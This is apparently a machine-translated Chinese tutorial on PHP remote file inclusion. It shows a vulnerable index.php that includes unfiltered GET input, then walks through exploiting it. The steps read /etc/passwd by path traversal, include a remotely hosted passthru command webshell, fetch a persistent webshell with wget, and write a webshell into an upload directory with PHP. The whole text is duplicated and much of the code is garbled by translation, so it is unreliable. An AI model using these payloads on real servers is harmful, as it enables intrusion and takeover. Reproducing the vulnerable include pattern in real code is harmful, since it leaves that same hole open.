PHP remote include file vulnerability analysis
- 2020-03-31 16:46:06
- OfStack
Almost all cgi programs have this bug, but the specific way of expression is not the same.
Include (),require() and include_once(),require_once()
Include () && require() statement: includes and runs the specified file.
The two structures are identical except in how they handle failure. Include () generates a warning and require() causes a fatal error. In other words, if you want to stop processing pages when you encounter a lost file, use require(). Include () is not, and the script continues to run.
If "allow_url_fopen" is enabled in PHP (the default configuration), you can also specify the files to be included using the URL (via HTTP or some other supported encapsulation protocol) instead of the local file. If the target server interprets the target file as PHP code, you can pass variables to the included file with the URL request string that applies to HTTP GET.
Detailed reference: http://cn.php.net/manual/en/function.include.php
Require_once () && include_once ()
The require_once () and include_once() statements include and run the specified file during the execution of the script. This behavior is similar to the require() statement, except that if the code in the file has already been included, it will not be included again. For cases where the same file may be included more than once during script execution, you want to make sure it is included only once to avoid problems such as function redefinition, variable reassigning, etc.
Detailed reference: http://cn.php.net/manual/en/function.require-once.php
Why include files
Programmers don't like to do the same thing and write the same code (such as some common functions) several times when they write a program, so they write the code that needs to be common in a separate file, such as share-php, and then include calls in other files. In PHP, we are using the above listed the several functions to achieve this goal, its working process: if you want to in the main. PHP contains share. PHP, I will write the include (" share. PHP "), then you can use the share. In PHP function, like this nature written death needs to include the file name is no problem, also won't appear, so where exactly is the problem?
Sometimes you may not be sure which file to include, such as the following file, index.php:
A normal piece of PHP code, how does it work? I'm not going to talk about the meaning of $_GET (or write another HTTP article), but if you don't know about GET, POST, etc., you'll need to Google some more.
The use of the code above format could be like this: / / www.jb51.net/php/index.php? Page = main. PHP or HTTP: / / www.jb51.net/php/index.php? Page =downloads.php, in combination with the above code, briefly describe how it works:
1. Submit the URL above and get the value of the page ($_GET) in index.php.
2. Check if $_GET is empty. If not (in this case, main.php), include the file with include.
If $_GET is empty, execute the else, the includehome.php file.
Three, why there are loopholes
You might say, oh, that's great, you can include files dynamically by URL, how convenient, how buggy is that? Answer is: we are not clever, we always like, unlike others, we do not follow his links to the operation, we may want to write their own want to include (call) files, for example, we can just enter the following URL: HTTP: / / www.jb51.net/php/index.php? Page = hello. PHP. Then our index.php program foolishly followed the above steps to execute: take the page as hello.php, then go to include(hello.php), then the problem occurred, because we do not have the file hello.php, so it will warn when it includes, like the following information:
Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/ PHP /index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/ PHP /index.php on line 3
Note that the Warning above simply cannot find the hello.php file specified by us, that is, the file containing the specified path. The following warning is issued when included because the specified file was not found earlier.
Four, how to use
As you can see from the above, there is a problem, so how can we make use of such a loophole? There are many ways to make use of it, but in essence, they are all the same. Here are three common ways to make use of it:
1. Contains other files to read on the target
By the front we can see that due to obtain the parameters of the page without filtering, so we can specify the target on a host of other sensitive files, in front of the warning, for example, we can see that the exposure of the absolute path (vhost/PHP /), then we can detect many times to include other documents, such as specified URL: HTTP: / / www.jb51.net/php/index.php? Page =./txt.txt can read the current path under the txt.txt file, you can also use.. /.. / directory jump (in the unfiltered.. / in the case of); Also can be read directly specify an absolute path, sensitive system files, such as the URL: HTTP: / / www.jb51.net/php/index.php? Page =/etc/passwd, this file can be read if the target host is not too restrictive or has high permissions to start Apache. Otherwise you get a Warning similar to: open_basedir restriction in effect.
2. Contains runnable PHP trojans
If the target host "allow_url_fopen" is activated (default is activated, few people will modify), we can have greater use of space, we can specify other URL on a webshell containing PHP code to run directly, for example, I'll write a run command PHP code (with comments, should understand), the following is saved as a CMD. TXT (suffix is not important, as long as the content format for PHP is ok).
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
If (get_magic_quotes_gpc ())
{$_REQUEST [" CMD "] = stripslashes ($_REQUEST [] "CMD"); }// remove escape characters (can remove backslash characters in the string)
Ini_set (" max_execution_time ", 0); // set the execution time for this file, 0 to unlimited.
Echo"
1. S.T
"; // print the return start prompt
Passthru ($_REQUEST [" CMD "]); // run the command specified by CMD
Echo"
1. S.T
"; // printed end line prompt message returned
? >
The purpose of the file above is to accept the command specified by the CMD and call the passthru function to execute, returning the contents between 1.s.t. To save this file to our host server (host) that do not support PHP, just can through HTTP access to, such as the address is as follows: HTTP: / / www.jb51.net/cmd.txt, then we can in the holes on the host structure the following URL to use: HTTP: / / www.jb51.net/php/index.php? page=//www.jb51.net/cmd.txt? CMD =ls, where CMD is the command you need to execute, other commonly used commands (take *UNIX as an example) as follows:
Quote:
Ll column directories, files (equivalent to dir under Windows)
PWD looks at the current absolute path
The id whoami views the current user
Wget downloads the file with the specified URL
And so on other, your host to BAIDU to find it, not listed.
The above method is to get a Webshell (the PHP file is not on the target, but it is a Webshell, isn't it? Ha ha)
3. A PHP file that contains a create file
Maybe some people think that it is safer to get a real Webshell on the target machine. In case someone finds a bug that contains a patch, we can't get the "fake "Webshell on the remote inclusion, right? You can understand that mentality. Let's move on. To get a real Webshell, we also talk about two common methods:
1) use a command like wget to download a Webshell
This is simple, is also very common, in the pseudo webshell we get above, we can execute the command, then we can also call a great role in the system and wget, strong you can Google this command, a lot of parameters, absolute confuse you, ha ha, we don't need so complicated, we will use a -o (- output - the document = FILE, the document written in the FILE FILE) is ok, hehe.
Premise is you in accordance with the previous steps to put a Webshell include PHP code in a can through HTTP or FTP access, for example: HTTP: / / www.jb51.net/1stphp.txt, Webshell is written in this file. Then we get in front of pseudo Webshell URL://www.jb51.net/php/index.php? perform as follows page=//www.jb51.net/cmd.txt? CMD = wget / / www.jb51.net/1stphp.txt - O 1 STPHP. PHP, if the current directory to write, you can get a place called 1 STPHP. PHP Webshell; If the current directory is not writable, there are other ways to do this.
2) use files to create
The previous wget might encounter a situation where the current directory cannot be written; Or the target host has disabled (or not installed) this command, we need to be flexible, we can combine the previous include file vulnerability to include a file creation (write file) PHP script, as follows:
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
$f = file_get_contents (" / / www.jb51.net/1stphp.txt "); // opens the file stream for the specified path
$ff = fopen (". / upload / 1 st. PHP ", "a"); // find a possible directory and create a file
Fwrite ($ff, $f); // write the previously opened file stream to the created file
Fclose ($ff); // close the save file
? >
It's still the same PHP file that we downloaded above with wget, but we've improved the method to implement it with a PHP script, so you can use cmd.php above? CMD =ll finds a directory to write to, such as the upload here, and creates the file in this directory:./upload/ 1g.php. And then we have our Webshell.
Five, the latter
In fact, here we can end this sub-topic, the last few words, the document contains the vulnerability is basically relatively simple but high risk coefficient vulnerability, in many systems still exist, as long as a little careful, you can find a lot of. Use up the process is more flexible, to be good at analyzing the problem, find a solution, you can slowly progress.
The vulnerability involves a lot of knowledge, can not be involved in one by one, did not say where to clear, welcome to ask questions, or go to Google to solve. Time is in a hurry, the description is not appropriate also hope that we correct revision!
Finally, such things need more practice. When I have time, I will find a specific example to go through the process, so that we have a deep understanding; You can also go to look now, find what vulnerability, I hope you can put their more detailed analysis and use process here to share with you! May you make progress
Include (),require() and include_once(),require_once()
Include () && require() statement: includes and runs the specified file.
The two structures are identical except in how they handle failure. Include () generates a warning and require() causes a fatal error. In other words, if you want to stop processing pages when you encounter a lost file, use require(). Include () is not, and the script continues to run.
If "allow_url_fopen" is enabled in PHP (the default configuration), you can also specify the files to be included using the URL (via HTTP or some other supported encapsulation protocol) instead of the local file. If the target server interprets the target file as PHP code, you can pass variables to the included file with the URL request string that applies to HTTP GET.
Detailed reference: http://cn.php.net/manual/en/function.include.php
Require_once () && include_once ()
The require_once () and include_once() statements include and run the specified file during the execution of the script. This behavior is similar to the require() statement, except that if the code in the file has already been included, it will not be included again. For cases where the same file may be included more than once during script execution, you want to make sure it is included only once to avoid problems such as function redefinition, variable reassigning, etc.
Detailed reference: http://cn.php.net/manual/en/function.require-once.php
Why include files
Programmers don't like to do the same thing and write the same code (such as some common functions) several times when they write a program, so they write the code that needs to be common in a separate file, such as share-php, and then include calls in other files. In PHP, we are using the above listed the several functions to achieve this goal, its working process: if you want to in the main. PHP contains share. PHP, I will write the include (" share. PHP "), then you can use the share. In PHP function, like this nature written death needs to include the file name is no problem, also won't appear, so where exactly is the problem?
Sometimes you may not be sure which file to include, such as the following file, index.php:
if ($_GET) {
include $_GET;
} else {
include "home.php";
}
A normal piece of PHP code, how does it work? I'm not going to talk about the meaning of $_GET (or write another HTTP article), but if you don't know about GET, POST, etc., you'll need to Google some more.
The use of the code above format could be like this: / / www.jb51.net/php/index.php? Page = main. PHP or HTTP: / / www.jb51.net/php/index.php? Page =downloads.php, in combination with the above code, briefly describe how it works:
1. Submit the URL above and get the value of the page ($_GET) in index.php.
2. Check if $_GET is empty. If not (in this case, main.php), include the file with include.
If $_GET is empty, execute the else, the includehome.php file.
Three, why there are loopholes
You might say, oh, that's great, you can include files dynamically by URL, how convenient, how buggy is that? Answer is: we are not clever, we always like, unlike others, we do not follow his links to the operation, we may want to write their own want to include (call) files, for example, we can just enter the following URL: HTTP: / / www.jb51.net/php/index.php? Page = hello. PHP. Then our index.php program foolishly followed the above steps to execute: take the page as hello.php, then go to include(hello.php), then the problem occurred, because we do not have the file hello.php, so it will warn when it includes, like the following information:
Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/ PHP /index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/ PHP /index.php on line 3
Note that the Warning above simply cannot find the hello.php file specified by us, that is, the file containing the specified path. The following warning is issued when included because the specified file was not found earlier.
Four, how to use
As you can see from the above, there is a problem, so how can we make use of such a loophole? There are many ways to make use of it, but in essence, they are all the same. Here are three common ways to make use of it:
1. Contains other files to read on the target
By the front we can see that due to obtain the parameters of the page without filtering, so we can specify the target on a host of other sensitive files, in front of the warning, for example, we can see that the exposure of the absolute path (vhost/PHP /), then we can detect many times to include other documents, such as specified URL: HTTP: / / www.jb51.net/php/index.php? Page =./txt.txt can read the current path under the txt.txt file, you can also use.. /.. / directory jump (in the unfiltered.. / in the case of); Also can be read directly specify an absolute path, sensitive system files, such as the URL: HTTP: / / www.jb51.net/php/index.php? Page =/etc/passwd, this file can be read if the target host is not too restrictive or has high permissions to start Apache. Otherwise you get a Warning similar to: open_basedir restriction in effect.
2. Contains runnable PHP trojans
If the target host "allow_url_fopen" is activated (default is activated, few people will modify), we can have greater use of space, we can specify other URL on a webshell containing PHP code to run directly, for example, I'll write a run command PHP code (with comments, should understand), the following is saved as a CMD. TXT (suffix is not important, as long as the content format for PHP is ok).
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
If (get_magic_quotes_gpc ())
{$_REQUEST [" CMD "] = stripslashes ($_REQUEST [] "CMD"); }// remove escape characters (can remove backslash characters in the string)
Ini_set (" max_execution_time ", 0); // set the execution time for this file, 0 to unlimited.
Echo"
1. S.T
"; // print the return start prompt
Passthru ($_REQUEST [" CMD "]); // run the command specified by CMD
Echo"
1. S.T
"; // printed end line prompt message returned
? >
The purpose of the file above is to accept the command specified by the CMD and call the passthru function to execute, returning the contents between 1.s.t. To save this file to our host server (host) that do not support PHP, just can through HTTP access to, such as the address is as follows: HTTP: / / www.jb51.net/cmd.txt, then we can in the holes on the host structure the following URL to use: HTTP: / / www.jb51.net/php/index.php? page=//www.jb51.net/cmd.txt? CMD =ls, where CMD is the command you need to execute, other commonly used commands (take *UNIX as an example) as follows:
Quote:
Ll column directories, files (equivalent to dir under Windows)
PWD looks at the current absolute path
The id whoami views the current user
Wget downloads the file with the specified URL
And so on other, your host to BAIDU to find it, not listed.
The above method is to get a Webshell (the PHP file is not on the target, but it is a Webshell, isn't it? Ha ha)
3. A PHP file that contains a create file
Maybe some people think that it is safer to get a real Webshell on the target machine. In case someone finds a bug that contains a patch, we can't get the "fake "Webshell on the remote inclusion, right? You can understand that mentality. Let's move on. To get a real Webshell, we also talk about two common methods:
1) use a command like wget to download a Webshell
This is simple, is also very common, in the pseudo webshell we get above, we can execute the command, then we can also call a great role in the system and wget, strong you can Google this command, a lot of parameters, absolute confuse you, ha ha, we don't need so complicated, we will use a -o (- output - the document = FILE, the document written in the FILE FILE) is ok, hehe.
Premise is you in accordance with the previous steps to put a Webshell include PHP code in a can through HTTP or FTP access, for example: HTTP: / / www.jb51.net/1stphp.txt, Webshell is written in this file. Then we get in front of pseudo Webshell URL://www.jb51.net/php/index.php? perform as follows page=//www.jb51.net/cmd.txt? CMD = wget / / www.jb51.net/1stphp.txt - O 1 STPHP. PHP, if the current directory to write, you can get a place called 1 STPHP. PHP Webshell; If the current directory is not writable, there are other ways to do this.
2) use files to create
The previous wget might encounter a situation where the current directory cannot be written; Or the target host has disabled (or not installed) this command, we need to be flexible, we can combine the previous include file vulnerability to include a file creation (write file) PHP script, as follows:
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
$f = file_get_contents (" / / www.jb51.net/1stphp.txt "); // opens the file stream for the specified path
$ff = fopen (". / upload / 1 st. PHP ", "a"); // find a possible directory and create a file
Fwrite ($ff, $f); // write the previously opened file stream to the created file
Fclose ($ff); // close the save file
? >
It's still the same PHP file that we downloaded above with wget, but we've improved the method to implement it with a PHP script, so you can use cmd.php above? CMD =ll finds a directory to write to, such as the upload here, and creates the file in this directory:./upload/ 1g.php. And then we have our Webshell.
Five, the latter
In fact, here we can end this sub-topic, the last few words, the document contains the vulnerability is basically relatively simple but high risk coefficient vulnerability, in many systems still exist, as long as a little careful, you can find a lot of. Use up the process is more flexible, to be good at analyzing the problem, find a solution, you can slowly progress.
The vulnerability involves a lot of knowledge, can not be involved in one by one, did not say where to clear, welcome to ask questions, or go to Google to solve. Time is in a hurry, the description is not appropriate also hope that we correct revision!
Finally, such things need more practice. When I have time, I will find a specific example to go through the process, so that we have a deep understanding; You can also go to look now, find what vulnerability, I hope you can put their more detailed analysis and use process here to share with you! May you make progress